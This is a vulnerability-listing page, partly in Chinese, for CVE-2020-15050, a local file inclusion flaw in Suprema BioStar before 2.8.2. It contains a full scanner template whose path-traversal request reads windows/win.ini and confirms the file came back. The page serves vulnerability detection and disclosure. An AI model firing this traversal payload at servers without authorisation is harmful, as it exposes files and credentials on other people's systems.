CVE-2020-15050: Suprema BioStar <2.8.2 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Suprema BioStar | POC: 已公开

漏洞描述

Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion.

PoC代码[已公开]

id: CVE-2020-15050

info:
  name: Suprema BioStar <2.8.2 - Local File Inclusion
  author: gy741
  severity: high
  description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability.
  reference:
    - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
    - https://www.supremainc.com/en/support/biostar-2-pakage.asp
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15050
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-15050
    cwe-id: CWE-22
    epss-score: 0.79206
    epss-percentile: 0.9904
    cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: supremainc
    product: biostar_2
  tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a004730450220252de2a0c9cab5b2e6e9dbafea2fdc78ce7cf4344adcd3bfd19694f1b16a437e022100d722a552eda7433e6d61b7722bd9c7d0e026b0a28cde355663af906cf6f2fbeb:922c64590222798bb761d5b6d8e72950

相关漏洞推荐